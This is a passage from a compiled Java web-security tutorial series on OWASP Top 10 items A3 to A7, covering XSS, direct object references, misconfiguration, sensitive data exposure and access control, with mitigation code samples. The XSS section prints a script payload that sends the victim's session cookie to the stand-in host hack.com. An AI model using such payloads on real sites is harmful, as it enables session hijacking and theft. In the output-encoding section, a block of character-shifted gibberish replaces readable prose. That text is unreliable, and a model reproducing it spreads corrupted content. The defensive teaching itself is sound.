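        String[] protocols = intersect(ALLOWED_PROTOCOLS, supportedProtocols);
        String[] suites = intersect(ALLOWED_SUITES, supportedSuites);
        if (protocols.length == 0 || suites.length == 0) {
            throw new IllegalStateException("SSL stack supports none of the allowed protocols/suites");
        }
        SSLParameters params = new SSLParameters(suites, protocols);
        params.setUseCipherSuitesOrder(true); // server preference wins, not the client's (JDK 8+)
        return params;
    }

    public static void main(String[] args) throws Exception {
        SSLContext ctx = SSLContext.getDefault();
        SSLServerSocket server = (SSLServerSocket) ctx.getServerSocketFactory().createServerSocket(0);
        SSLParameters supported = ctx.getSupportedSSLParameters();
        SSLParameters hardened = hardenedParameters(supported.getProtocols(), supported.getCipherSuites());
        server.setSSLParameters(hardened);
        System.out.println("protocols: " + Arrays.toString(server.getEnabledProtocols()));
        System.out.println("suites:    " + Arrays.toString(server.getEnabledCipherSuites()));
        server.close();
    }
}
```

Running it on a new JRE after an upgrade is a quick check that the allow-list still matches what the stack offers: an empty intersection fails at startup instead of quietly degrading to whatever the provider enables by default.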
In 2012, the same two security researchers revealed CRIME (https://docs.google.com/a/ippon.fr/presentation/d/…) (Compression Ratio Info-leak Made Easy) that exploits a vulnerability in TLS when data compression is activated. The mitigation is to not use data compression along with TLS. If the client (the browser) proposes compression algorithms, the server must refuse all of them.
Last but not least, in 2013, three other security researchers, Angelo Prado, Neal Harris and Yoel Gluck, improve CRIME with BREACH (https://media.blackhat.com/us-13/US-13-Prado-SSL-Gone-in-30-seconds-A-BREACH-beyond-CRIME-Slides.pdf) (Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext). This time, they exploit a vulnerability in data compression at HTTP protocol level so BREACH works even if TLS data compression is disabled. The best mitigation is to have an efficient CSRF protection (dynamic CSRF token per request). You could also disable HTTP compression but this will have a big impact on the performances.
Tip: To know if your server is vulnerable to BEAST and CRIME, you can download the TestSSLServer (http://www.bolet.org/TestSSLServer/) tool. For BREACH, you can wait for an updated version or download the source and add the BREACH detection by yourself. The tool is under an MIT-like license.
Other attacks can, for example, force a SSL/TLS renegotiation or downgrade the protocol version.
Although the risk is real, to be exploitable, most of the TLS vulnerabilities require the attacker and the victim to be on the same network (public Wifi, LAN…) or the attacker to have access to the victim’s network (ISP or government employees).
Description
Cross-Site Scripting is a specific consequence of an injection attack. The goal is to make a web browser execute arbitrary scripting code (Javascript, ActionScript, ActiveX…) usually to steal personal information.
Examples
Persistent XSS attack
The attacker’s bank website proposes a messaging service to communicate with the clerk.
The attacker posts the following message:
Happy New Year!
<script>x=new Image(); x.src=http://hack.com/ilovecookies.jsp?yummy=+document.cookie</script>
Once connected on the bank’s website with his special account, the bank clerk consults his new messages. When he opens the suspicious message, he will see the “Happy New Year!” greetings. The second line of the message will not be shown but interpreted by his browser which will silently send his session ID to hack.com. Then the attacker will be able to hijack the clerk’s session on the bank’s website to have access to sensitive information on other clients…
Non-persistent XSS attack
The attacker sends to the clerk an email asking him to consult his account with the following direct link to the website:
https://www.mybank.com/details?iban=<script>x=new Image(); x.src=http://hack.com/ilovecookies.jsp?yummy=+document.cookie</script>
Once authenticated with his own account, the clerk tries to display the account page using the provided link but obviously the bank could not find the requested IBAN and displays an error page to the clerk:
IBAN not found: <script>x=new Image(); x.src=http://hack.com/ilovecookies.jsp?yummy=+document.cookie</script>
Of course, the clerk can only see the beginning of the message “IBAN not found: ”. The javascript snippet is interpreted by the clerk’s browser and silently sends the clerk’s session ID to hack.com.
Mitigations
Protection against injection attack
If your web application is not protected against injection (http://blog.ippon.fr/2013/10/11/owasp-top-10-a1/) attacks, it is definitely vulnerable to XSS attacks. When possible, validate untrusted input before usage and storage.
OWASP Top 10 – A3 Cross-Site Scripting (XSS)
Output encoding
Sometimes, it is difficult to have an exhaustive white-list of allowed characters when the input is a free text. In these cases, it is important to canonicalize the input data before storage then encode output data so that special characters are not misinterpreted by the browser. If you don’t canonicalize the input data before storage, encoded input data will be re-encoded.
E.g. < and > must be converted into &lt; and &gt; in HTML pages or the string between these 2 characters could be interpreted by the browser as an HTML tag. In the examples above, after encoding, <script> becomes &lt;script&gt; and won’t be interpreted as a script tag by the browser but displayed as text. Thus the suspicious javascript code won’t be executed.
Of course, untrusted code can be inserted anywhere in the web page. ESAPI (https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API)’s Encoder can be used to encode characters depending on where you need to insert untrusted code. Below are some examples:
Encoder encoder = ESAPI.encoder();
String rawOutput = "<script>alert(\"hello\");</script>";
System.out.println("Encoded for HTML : "+encoder.encodeForHTML(rawOutput));
System.out.println("Encoded for CSS : "+encoder.encodeForCSS(rawOutput));
System.out.println("Encoded for Javascript : "+encoder.encodeForJavaScript(rawOutput));
System.out.println("Encoded for URL : "+encoder.encodeForURL(rawOutput));
Console output:
Encoded for HTML : &lt;script&gt;alert&#x28;&quot;hello&quot;&#x29;&#x3b;&lt;&#x2f;script&gt;
Encoded for CSS : \3c script\3e alert\28 \22 hello\22 \29 \3b \3c \2f script\3e
Encoded for Javascript : \x3Cscript\x3Ealert\x28\x22hello\x22\x29\x3B\x3C\x2Fscript\x3E
Encoded for URL : %3Cscript%3Ealert%28%22hello%22%29%3B%3C%2Fscript%3E
,OC@M JK@I-NJPM>@ OCDM?-K<MOD@N @SDNO OJ @I>J?@ O@SO =@AJM@ JPOKPO. %<Q@ < GJJF JI AK<>C@ JHHJIN-)<IB3
A-& (COOK://>JHHJIN.<K<>C@.JMB/KMJK@M/>JHHJIN-G<IB/E<Q<?J>N/<KD-3.1/JMB/<K<>C@/>JHHJIN/G<IB3/
0OMDIB"N><K@2ODGN.COHG). &O DN G@NN NOMD>O JI @I>J?DIB =PO DO DN <>>@KO<=G@ AJM < NDHKG@ R@= <KKGD><ODJI.
System.out.println("Encoded for HTML : "+StringEscapeUtils.escapeHtml4(rawOutput));
Console output:
Encoded for HTML : &lt;script&gt;alert(&quot;hello&quot;);&lt;/script&gt;
HTTPOnly cookie flag
The examples above show two different ways to steal a session ID. As discussed in the previous article, if an attacker steals the session ID of a user authenticated on a website, he can impersonate the victim on that website.
Although only the web browser needs to know the session ID, anyone (including a script) could read the value. That's why Microsoft IE6 developers decided to implement the HTTPOnly flag. When this flag is set (and if the browser supports it), the XSS attack above won't be able to steal the session ID.
If your application is Servlet 3.0 compliant, you can configure it by adding the following in your web.xml:
<session-config>
<cookie-config>
<http-only>true</http-only>
</cookie-config>
</session-config>
Otherwise, you will need to configure your server. For example, if you use Apache Tomcat 6, you can set the HTTPOnly flag on cookies by adding the attribute useHttpOnly="true" in your context.xml:
<Context ... useHttpOnly="true">
</Context>
To see all articles related to OWASP Top 10, follow the tag #owasp (http://blog.ippon.fr/tag/owasp/)

OWASP Top 10 – A4 Insecure Direct Object References
Description
The application exposes a direct reference (functional identifier, database key, file path…) to a resource. Thanks to that direct reference, an attacker can guess other direct references and access other resources.
Usually, you will find direct references in links and selection lists (drop-down list, radio buttons and checkboxes) built dynamically with objects retrieved from the database.
Examples
Let's take again the same example with my bank's website.
I can access my account page simply by providing my IBAN in the URL:
http://www.mybank.com/details?iban=FR2711111222333444555666777
An attacker could have access to any other account by simply providing a valid IBAN!
Mitigations
Access control
It may be obvious for most of you but it's important: before giving access to a protected resource, verify that the requestor is authorized to access that resource.
For my example, you must verify that the account with the requested IBAN belongs to the authenticated user before you display the account details.
Indirect object reference
Replace the direct reference with an indirect reference.
The principle is simple: on the server side, for each direct reference, generate another identifier and use this identifier in your web page instead of the direct reference. The generated identifier can be a random value, a hash value, a numeric sequence… Anything you want as long as it is not possible for an attacker to guess a direct reference from the exposed identifier. Of course, on the server side, you will need a mapping table to retrieve the direct reference.
When you create your view objects, replace all direct references with generated indirect references:
...
Map<String, String> accountIndirectRefs = new HashMap<String, String>();
List<AccountVO> accountVOList = new ArrayList<AccountVO>();
String accountIndirectRef = null;
AccountVO accountVO = null;
for(String account : accountList) {
accountVO = new AccountVO();
accountIndirectRef = generateIndirectReference();
accountIndirectRefs.put(accountIndirectRef, account.getIban());
accountVO.setReference(accountIndirectRef);
accountVOList.add(accountVO);
}
session.setAttribute("accountIndirectRefs", accountIndirectRefs);
...
In this sample, you can see that the indirect reference generated using the generateIndirectReference() method does not rely on the direct reference. This method can return a simple sequence of numbers (1, 2, 3…) or characters (A, B, …) but I recommend a random alphanumeric string. Thus an attacker won't be able to guess the possible indirect values. We will talk about CSRF attacks in another article.
In the “My Accounts” page, the links to the account details won't have the real IBAN anymore as a parameter but the indirect reference in a new ibanRef parameter. When you process the request, you retrieve the direct reference from the provided indirect reference:
...
String ibanRef = request.getParameter("ibanRef");
Map<String, String> accountIndirectRefs = (Map<String, String>) session.getAttribute("accountIndirectRefs"); // getAttribute() returns Object: the cast is required
String iban = accountIndirectRefs.get(ibanRef);
...
If the indirect reference is not found in the session, it is certainly an attack.
In this example, it could also be a customer who has saved the link in his favorites but, in the real world, you would not have a direct link to the account page, right?
You can also use a third-party framework like ESAPI to generate and manage your indirect references. ESAPI provides the AccessReferenceMap<K> (http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.html) interface and proposes two out-of-the-box implementations to generate either an integer or a random string indirect reference. Of course, you can create your own implementation to generate whatever you want…
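As an added example (not code from the original post or from ESAPI), here is a small per-session indirect reference map in Java that follows the two mitigations above: random alphanumeric tokens stand in for IBANs, and only the authenticated user's own IBANs are ever registered, so a token that does not resolve is rejected. Class and method names are this example's own; the IBANs are constructed sample values.

```java
import java.security.SecureRandom;
import java.util.HashMap;
import java.util.Map;

/**
 * Added example (not code from the original post or from ESAPI): a per-session
 * map between random indirect references and direct references (IBANs).
 * Only IBANs that belong to the authenticated user are registered, so an
 * indirect reference that does not resolve means a stale link or tampering.
 */
public class IndirectReferenceMap {

    private static final String ALPHABET =
            "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    private static final int LENGTH = 16; // 62^16 > 2^95 possibilities: not guessable
    private static final SecureRandom RANDOM = new SecureRandom();

    private final Map<String, String> indirectToDirect = new HashMap<String, String>();
    private final Map<String, String> directToIndirect = new HashMap<String, String>();

    /** Random alphanumeric string, the generator the text recommends. */
    static String generateIndirectReference() {
        StringBuilder sb = new StringBuilder(LENGTH);
        for (int i = 0; i < LENGTH; i++) {
            sb.append(ALPHABET.charAt(RANDOM.nextInt(ALPHABET.length())));
        }
        return sb.toString();
    }

    /** Registers an IBAN the current user owns; the same IBAN keeps one token per session. */
    public synchronized String addDirectReference(String iban) {
        String existing = directToIndirect.get(iban);
        if (existing != null) {
            return existing;
        }
        String ref;
        do {
            ref = generateIndirectReference();
        } while (indirectToDirect.containsKey(ref)); // collisions are astronomically rare, but cheap to exclude
        indirectToDirect.put(ref, iban);
        directToIndirect.put(iban, ref);
        return ref;
    }

    /** Resolves a request parameter; null means unknown reference, which the caller must reject and log. */
    public synchronized String getDirectReference(String indirectRef) {
        return indirectRef == null ? null : indirectToDirect.get(indirectRef);
    }

    // Demo with constructed IBANs (not real accounts).
    public static void main(String[] args) {
        IndirectReferenceMap map = new IndirectReferenceMap();
        String ref = map.addDirectReference("FR2711111222333444555666777");
        map.addDirectReference("FR7630006000011234567890189");
        System.out.println("Link parameter: ibanRef=" + ref);
        System.out.println("Resolves to   : " + map.getDirectReference(ref));
        // Passing the IBAN itself, or any guessed value, no longer resolves anything.
        System.out.println("Forged value  : " + map.getDirectReference("FR7630006000011234567890189"));
    }
}
```

Keep one instance per HTTP session (session.setAttribute, as the sample above does with its map) and fill it only with the accounts returned for the authenticated user; resolving the ibanRef parameter then performs the access control check for free, because an IBAN the user does not own was never put in the map.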

OWASP Top 10 – A5 Security Misconfiguration
Description
Nowadays, besides the operating system and the JRE, most Java applications are based on third-party frameworks, open-source or proprietary. Moreover, a web application is deployed on an application server (or a servlet container).
All these components represent a lot of potential risks an attacker can use if he has enough information on the environment.
Examples
HTTP header
By checking the Server HTTP header sent by the bank's website, the attacker knows which web server you are using and can look for its vulnerabilities.
Stack trace
An attacker finds a way to generate an uncaught exception on your bank's website. The stack trace is displayed in a web page. With that revealed information, the attacker knows which portal solution is used. And, as the default administration account was not deleted and the password was not modified, the attacker can easily log in as an administrator and do whatever he wants on the website.
Mitigations
First of all, let me give a few examples of components you have to properly configure:
• Operating System (Linux, Solaris, AIX, Windows…)
• Java Runtime Environment (Sun, IBM…)
• Application Server, Servlet Container (Tomcat, Jetty, Glassfish, JBoss…)
• Web Server (HTTPD, Nginx…)
• RDBMS (Oracle, SQL Server, MySQL…)
• Third-party frameworks
  ◦ Spring
  ◦ WS stack (CXF, Spring WS, Axis2…)
  ◦ ORM framework (Hibernate, TopLink…)
  ◦ JSF implementation (PrimeFaces, MyFaces…)
  ◦ Portal (Liferay, eXo…)
[Image: security_holes.png, source: xkcd.com]
Install security patches
It is easier to attack a website when you know its Achilles' heel.
Security advisories are published after the related security fixes are released by the server provider (e.g. Apache 2.2 (http://httpd.apache.org/security/vulnerabilities_22.html), Apache 2.4 (http://httpd.apache.org/security/vulnerabilities_24.html), all versions of Nginx (http://nginx.org/en/security_advisories.html)). If an attacker knows you are using an old version of a component and that version has a critical security issue, he can use this weakness to penetrate your system.
Hence, security fixes must be tested and deployed as soon as possible on production. Of course, if you have a continuous integration environment with automated unit tests and integration tests, it will be easier and faster to test all your application but this is out of the scope of this article. Depending on the severity of the security issue, the acceptable delay for deploying the security patches can be less than 1 month for a critical issue up to 3 months for a low severity issue.
Tip: Subscribe to the mailing-list of each component (OS, servers, third-party frameworks…) used to run your application to be informed as soon as a new version is available. E.g. subscribe to Apache mailing-lists (http://www.apache.org/foundation/mailinglists.html) to follow all Apache projects or Apache CXF mailing-lists (http://cxf.apache.org/mailing-lists.html) to follow only news about CXF.
Obfuscate sensitive information
Logs
Never store sensitive information in logs. If you protect these sensitive data (I hope you do), the way you protect them is also sensitive information. E.g. if you use PBKDF2 to protect your passwords, reveal neither the algorithm nor the number of iterations you apply.
Of course, some logs are generated by a third-party framework. In that case, properly configure your logging framework with the appropriate level to not store sensitive information. E.g. if your ORM framework logs the full connection string and the password at INFO level, don't activate this level on production for the framework or at least for the class that logs this information.
Last but not least, if you store your logs in a file, you must protect this file with appropriate access rights. If you have an automatic archiving mechanism for your logs, make sure the location of the archived logs has the same access right restrictions.
Stack traces
Stack traces are very useful to understand a bug and quickly fix it.
They are also a gold mine for an attacker. He can know which third-party frameworks you are using simply from the package names. He can also guess the version of that framework thanks to the class names or the line numbers. This kind of information can be used to find security holes in your application. Even if your own code is very secure, it can rely on less secure frameworks. So don't brag about your underlying frameworks!
If possible, don't store stack traces in logs on production. Logging frameworks propose a way to not log stack traces.
E.g. Log4J's Layout abstract class has the method abstract public boolean ignoresThrowable();. You can extend this class or an existing implementation class that fits your needs and override this method:
import org.apache.log4j.PatternLayout;

// Returning false tells the appender that the layout handles the throwable itself;
// PatternLayout never prints it, so the stack trace is left out of the log.
public class LayoutNoStackTraces extends PatternLayout {
    @Override
    public boolean ignoresThrowable() {
        return false;
    }
}
Be careful with the default configuration of your components. E.g. Tomcat's default error page displays the full stack trace in a web page when an uncaught error occurs in the application. To prevent this, you need to define your own error page by adding the following in your web.xml:
<error-page>
<exception-type>java.lang.Throwable</exception-type>
<location>/uncaught_error.jsp</location>
</error-page>
If you are exposing web services, be careful with the information your web service stack can automatically send. Sometimes, a stack trace can be added in the SOAP fault message.
Server name and version
HTTP headers also contain information about your environment.
• The “User-Agent” HTTP header gives information on the client that has generated the request (web browser, web service client…).
• The “Server” HTTP header gives information on the server that has generated the response (web server, application server…).
The information usually includes the name, the version, sometimes even the underlying operating system… Obviously, with this kind of information, it is easier for an attacker to find vulnerabilities in your application.
You can configure your components so that they send wrong or fake information. I recommend you always send public information like your domain name in these headers. Or, you can send a wrong name and/or version of the server, e.g. nginx/1.5.6 instead of Apache/2.4.1.
Note that obfuscating the server banner string is not 100% efficient against HTTP fingerprinting tools, though.
Information about the server is not only in HTTP headers. On a default installation of your web server, if you are trying to get a resource that does not exist, you may have in the response a page with a default HTTP 404 error message and a beautiful footer containing all the information you are trying to hide in the HTTP header. So don't forget to provide your own error page for each HTTP status code.
Java Runtime Environment
The default installation of the JRE does not contain samples so it is ready for production.
One exception though: change the default password of the provided CA trust store (cacerts) even if you don't plan to use SSL.
Servers (application server, servlet container, web server, database, portal…)
Protect the servers' configuration
The content of configuration files is sensitive and should not be exposed to unauthorized persons. Hence, like the log files, you must set appropriate access restrictions on the configuration files. Only the application account should be authorized to view and modify the configuration files.
Delete sample applications
Servers are often provided with samples. They are useful during the development phase to start using a new component. But they are not hardened for production and thus become backdoors for attackers.
Delete all sample applications, configuration files, accounts…
Review default configuration
Immediately after installation, you can start your servers because they are provided with samples and a simple default configuration.
On production, you must delete these samples immediately after installation. They can contain security issues that can be used as a back door to penetrate your system.
You must also review this default configuration in detail to ensure it fits your needs. Remove all unnecessary resources.
When possible, delete default administration accounts and create new ones. Otherwise, change the default passwords.
Operating system
Accounts
Protect the super user (root/administrator) account with a strong password. Don't use this super user account to start a service unless it is required by this service. For example, to start the Apache HTTPD server on reserved port 80 or 443, you must use the root user. Refer to section “Servers/Apache” to see how to configure Apache in that case.
Create a dedicated account for each service (application server, web server, database…). That account will be used to start and stop that service and won't have useless rights on other folders, accounts, applications or services. Only that account will have access to the configuration and the logs of its server.
Services
Depending on the operating system, you will have some services that will be automatically started. Stop the services you won't use and remove them from the list of auto-started services.
Be careful with the open ports. They can be scanned by an attacker and used to penetrate your system. Close the ports you won't use. In some cases, they can be opened by default for an auto-started service. When you deactivate a service, don't forget to close the ports used by that service if any.
Penetration test
To ensure all components are properly configured, if security really matters and if you have time and money for that, submit your environment to a full penetration test.
A penetration test consists in collecting information about the system under test like the OS name and version, the open ports, the name and version of started services (web server, application server…), supported SSL versions and acceptable cipher suites… Then, after analysis, the tester will try to exploit the collected information to penetrate the system using appropriate vulnerabilities.
To see all articles related to OWASP Top 10, follow the tag #owasp (http://blog.ippon.fr/tag/owasp/)

OWASP Top 10 – A6 Sensitive Data Exposure
Description
We have seen in the previous articles that an experienced attacker can easily intercept data in transit (e.g. on a public Wifi hotspot) or have access to data stored in your database (e.g. using SQL injection). If the stolen information is sensitive (password, credit card number, personal data…), it must have been encrypted.
Examples
Data in transit
My favorite restaurant provides a free wifi access point. Between the appetizer and the main meal, I want to check if my credit card will be accepted. I go to my bank's website, enter my login and password. Well, I'm sure you remember my bank's website does not use a secure connection. An attacker at the next table intercepts the network traffic and steals my session cookie. You know the end of the story… If you don't, you missed my article about “Broken Authentication and Session Management (http://blog.ippon.fr/2013/10/21/owasp-top-10-a2/)”
Data at rest
Using SQL Injection (http://blog.ippon.fr/2013/10/11/owasp-top-10-a1/), an attacker can download the credentials of all clients of my bank. Of course, the passwords are in clear text…
Note that this scenario is also applicable to an insider attack. If sensitive data are not encrypted, they are accessible to the database administrator.
Mitigations
Avoid storing sensitive data
Store sensitive data only when it is absolutely necessary. Never store sensitive data in log files.
As soon as the sensitive data is not necessary anymore, delete it.
Note: some sensitive data must never be stored. E.g. if your application processes credit/debit card data, according to PCI-DSS, you must never keep any trace of the CVV number, the 3/4 digits you will usually find on the back of the card.
Protect sensitive data
In Broken Authentication and Session Management (http://blog.ippon.fr/2013/10/21/owasp-top-10-a2/), we have already discussed how to protect specific sensitive data like credentials in transit and at rest. The same mitigations can be applied to other sensitive data.
In transit
Encrypt all exchanges containing sensitive data during transit. The encryption can be done at transport level (SSL/TLS) or at message level (e.g. WS-Security Encryption for SOAP messages).
Regarding the transport, properly choose the version of SSL and the cipher suites to make sure your sensitive data won't be decrypted on the wire. For the details, have a look at Broken Authentication and Session Management (http://blog.ippon.fr/2013/10/21/owasp-top-10-a2/).
Regarding WS-Security, AES-256 is recommended for data encryption; 3DES and shorter AES keys are weak. For key wrapping, RSA with OAEP padding is preferable because the other choice, RSA 1.5 (PKCS#1 v1.5), is known to have vulnerabilities. RSA keys of at least 2048 bits are recommended.
Tip: To use AES 256 or RSA 2048-bit keys, you will need to upgrade your JRE with the JCE unlimited strength policy files.
At rest
Besides the passwords to access your web application, you can have other data you may consider sensitive enough to protect them in your database like credit/debit card data, medical data, financial information…
If you don't need to retrieve these sensitive data in the clear, use the PBKDF2 mechanism to protect them like explained in Broken Authentication and Session Management (http://blog.ippon.fr/2013/10/21/owasp-top-10-a2/). Otherwise, you will need a 2-way encryption mechanism.
The easiest way is to use a secret key stored in a secure keystore to encrypt and decrypt the sensitive data. I recommend this option to encrypt sensitive data stored in the database.
Of course, only your application should have access to your decryption key. If you use your database to encrypt and decrypt the sensitive data, the encrypted data will be automatically decrypted after a SQL injection attack. If your DBA has access to the decryption key, he can decrypt any sensitive data in your database.
Last but not least, you should use different keys for different purposes. E.g. the key used to protect the credit card data should not also be used to protect the financial information. If one decryption key is compromised, your sensitive data won't be totally exposed.
Obviously, with that option, you will have to protect the keystore password and the key password if any… Moreover, you may need to protect other configuration data like the password to access the database.
For these configuration data and the password of the keystore, I recommend another encryption mechanism, based on a machine key, instead of using a shared key stored in a keystore.
The principle is quite simple:
1. Take 3/4 pieces of information associated with the host machine that won't change (e.g. IP address, host name, MAC address, user.name or user.home system properties, hard disk ID or CPU ID if accessible, OS name (without version), OS licence number if accessible…).
byte[] part1 = System.getProperty("user.home").getBytes("UTF-8");
byte[] part2 = InetAddress.getLocalHost().getAddress();
byte[] part3 = System.getProperty("user.name").getBytes("UTF-8");
byte[] part4 = InetAddress.getLocalHost().getHostName().getBytes("UTF-8");
2. Generate a hash with the selected values
MessageDigest md = MessageDigest.getInstance("SHA-256");
md.update(part1);
md.update(part2);
md.update(part3);
md.update(part4);
byte[] passwordAsByteArray = md.digest();
3. Generate a random value
byte[] salt = SecureRandom.getInstance("SHA1PRNG", "SUN").generateSeed(32);
4. Generate a secret key using the PBKDF2 mechanism with the hash as password and the random value as salt. The number of iterations you apply is up to you.
SecretKeyFactory skf = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1", "SunJCE");
// PBEKeySpec needs a char[]. Hex-encode the digest rather than decoding raw bytes as UTF-8,
// which is lossy (invalid sequences become U+FFFD) and would waste part of the hash.
StringBuilder hex = new StringBuilder();
for (byte b : passwordAsByteArray) {
    hex.append(String.format("%02x", b));
}
char[] passwordAsCharArray = hex.toString().toCharArray();
SecretKey secretKey = skf.generateSecret(new PBEKeySpec(passwordAsCharArray, salt, 10000, 256));
5. Encrypt the sensitive data, store the encrypted data in the configuration file and store the generated salt anywhere (the salt is not sensitive data).
Besides the ability to encrypt the keystore password, the main advantage of this mechanism is that, if you have several instances of your application, the encryption key will be different on each instance. So the configuration files will be different even if they contain exactly the same configuration.
Of course, you will have to modify the configuration file reader to automatically generate the key again (steps 1 to 4) and decrypt the encrypted data on the fly. E.g. if you store your configuration in properties files, you just need to override the getProperty method.
Tip: Using the same mechanism, you could add more entropy by generating a salt for each configuration file. And if you need even more, you can generate a salt for each configuration entry to be encrypted… Don't forget to store the salt at the right place. Add an entry in the file if you use one key per configuration file or along with each encrypted data if you prefer one key per entry.
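The five steps above assembled into one Properties subclass, as an added example that is not code from the original post. It assumes Java 8 (java.util.Base64), a JRE that allows 256-bit AES keys, and its own class and property names; the sample password is a constructed value.

```java
import java.net.InetAddress;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Arrays;
import java.util.Base64;
import java.util.Properties;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;

/**
 * Added example (not code from the original post): steps 1 to 5 above in one
 * Properties subclass. The AES key is derived from host attributes plus a salt
 * stored in the file, so a configuration file copied to another machine no
 * longer decrypts. Assumes Java 8 and a JRE allowing 256-bit AES keys.
 */
public class MachineKeyConfig extends Properties {

    private static final String PREFIX = "ENC:";          // marks encrypted values
    private static final String SALT_KEY = "config.salt"; // the salt is not sensitive
    private static final int ITERATIONS = 10000;

    // Steps 1 and 2: hash of host attributes that are not expected to change.
    static char[] machinePassword() throws Exception {
        MessageDigest md = MessageDigest.getInstance("SHA-256");
        md.update(System.getProperty("user.home").getBytes(StandardCharsets.UTF_8));
        md.update(System.getProperty("user.name").getBytes(StandardCharsets.UTF_8));
        md.update(System.getProperty("os.name").getBytes(StandardCharsets.UTF_8));
        md.update(InetAddress.getLocalHost().getHostName().getBytes(StandardCharsets.UTF_8));
        StringBuilder hex = new StringBuilder(); // hex, not a lossy UTF-8 decode of raw bytes
        for (byte b : md.digest()) {
            hex.append(String.format("%02x", b));
        }
        return hex.toString().toCharArray();
    }

    // Steps 3 and 4: PBKDF2 over the host hash with the file's salt yields the AES key.
    static SecretKey deriveKey(byte[] salt) throws Exception {
        SecretKeyFactory skf = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1");
        PBEKeySpec spec = new PBEKeySpec(machinePassword(), salt, ITERATIONS, 256);
        byte[] keyBytes = skf.generateSecret(spec).getEncoded();
        spec.clearPassword();
        return new SecretKeySpec(keyBytes, "AES");
    }

    // Step 3: the salt is generated once per file and stored in clear next to the data.
    private byte[] salt() {
        String stored = super.getProperty(SALT_KEY);
        if (stored != null) {
            return Base64.getDecoder().decode(stored);
        }
        byte[] fresh = new byte[32];
        new SecureRandom().nextBytes(fresh);
        super.setProperty(SALT_KEY, Base64.getEncoder().encodeToString(fresh));
        return fresh;
    }

    // Step 5: AES-CBC with a fresh random IV prepended to the ciphertext.
    public void setEncryptedProperty(String key, String clearValue) throws Exception {
        byte[] iv = new byte[16];
        new SecureRandom().nextBytes(iv);
        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
        cipher.init(Cipher.ENCRYPT_MODE, deriveKey(salt()), new IvParameterSpec(iv));
        byte[] ct = cipher.doFinal(clearValue.getBytes(StandardCharsets.UTF_8));
        byte[] out = Arrays.copyOf(iv, iv.length + ct.length);
        System.arraycopy(ct, 0, out, iv.length, ct.length);
        super.setProperty(key, PREFIX + Base64.getEncoder().encodeToString(out));
    }

    // Decrypt on the fly by overriding getProperty, as suggested above.
    @Override
    public String getProperty(String key) {
        String stored = super.getProperty(key);
        if (stored == null || !stored.startsWith(PREFIX)) {
            return stored;
        }
        try {
            byte[] in = Base64.getDecoder().decode(stored.substring(PREFIX.length()));
            Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
            cipher.init(Cipher.DECRYPT_MODE, deriveKey(salt()), new IvParameterSpec(Arrays.copyOf(in, 16)));
            return new String(cipher.doFinal(in, 16, in.length - 16), StandardCharsets.UTF_8);
        } catch (Exception e) {
            // Other machine, damaged file or tampering: fail closed rather than expose the raw value.
            throw new IllegalStateException("cannot decrypt property " + key, e);
        }
    }

    public static void main(String[] args) throws Exception {
        MachineKeyConfig cfg = new MachineKeyConfig();
        cfg.setEncryptedProperty("db.password", "example-only-secret"); // constructed value
        System.out.println("On disk  : " + cfg.get("db.password"));
        System.out.println("Decrypted: " + cfg.getProperty("db.password"));
    }
}
```

Values written with setEncryptedProperty() end up in the file as ENC: followed by the Base64 of IV and ciphertext, next to the config.salt entry, and Properties.store() writes them unchanged; getProperty() is the only place decryption happens, so code reading through it sees clear text. Each call re-runs PBKDF2, which is deliberate here for clarity; in production derive the SecretKey once at startup and keep it in memory.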
One last advice: don't forget to deactivate cache and auto-completion in sensitive pages of your web application.
To see all articles related to OWASP Top 10, follow the tag #owasp (http://blog.ippon.fr/tag/owasp/)

OWASP Top 10 – A7 Missing Function Level Access Control
Description
In a web application with different user roles, authentication is not enough. Each request must be controlled against the user's role to ensure the user is authorized to use the requested function or access the requested page.
Examples
On my bank's website, the clerk has a link in his navigation bar to manage the client accounts. The client can't see that link because clients are not allowed to access this section. But the item in the menu exists in the code; it is simply hidden dynamically using a Javascript function. By analyzing the HTML code, an attacker can easily find the URL to the account management section. And as access to this section is not controlled, the attacker can steal a lot of sensitive data (personal information, account data…).
Moreover, functions available in that account management section for clerks are not controlled either. The attacker can then transfer money to his own account. And, luckily for the attacker, his actions are not logged.
Mitigations
Control access
You need to be sure access to all pages and functions requiring authentication and specific authorization is controlled. To simplify and enforce security, your access control mechanism should be centralized and role-based. It is also highly recommended to always apply a “deny-by-default” rule, i.e. explicitly define what is allowed and disallow everything else.
You can use standard Java filters to achieve this goal. Some third-party frameworks also provide an API for centralized and role-based authentication and access control.
[Image: authorization.png, source: xkcd.com]
You first need to identify the different roles available on your web site. E.g. you can have the simple USER role for authenticated users with no additional rights, the MANAGER role to manage users and the ADMIN role with administration privileges.
When possible, organize your website according to these roles:
home.xhtml
login.xhtml
access_denied.xhtml
/secure
|_ home.xhtml
|_ /user
   |_ accounts.xhtml
   |_ account_details.xhtml
   |_ contact_my_clerk.xhtml
   |_ ...
|_ /mgmt
   |_ users.xhtml
   |_ messages.xhtml
   |_ ...
|_ /admin
   |_ managers.xhtml
   |_ monitoring.xhtml
   |_ ...
Then, you have to properly configure your preferred session management framework.
If the requested URL requires authentication, the framework should redirect unauthenticated users to the login page. If the requested URL requires a specific role, the framework should redirect to an “access denied” error page.
With Spring Security, the configuration should look like the following:
<sec:http auto-config="true" access-denied-page="/access_denied.xhtml">
<sec:form-login login-page="/login.xhtml" default-target-url="/secure/home.xhtml" />
<sec:intercept-url pattern="/login.xhtml*" access="IS_AUTHENTICATED_ANONYMOUSLY" />
<sec:intercept-url pattern="/secure/user/**" access="ROLE_USER,ROLE_MANAGER" />
<sec:intercept-url pattern="/secure/mgmt/**" access="ROLE_MANAGER" />
<sec:intercept-url pattern="/secure/admin/**" access="ROLE_ADMIN" />
<sec:intercept-url pattern="/secure/**" access="ROLE_USER,ROLE_MANAGER,ROLE_ADMIN" />
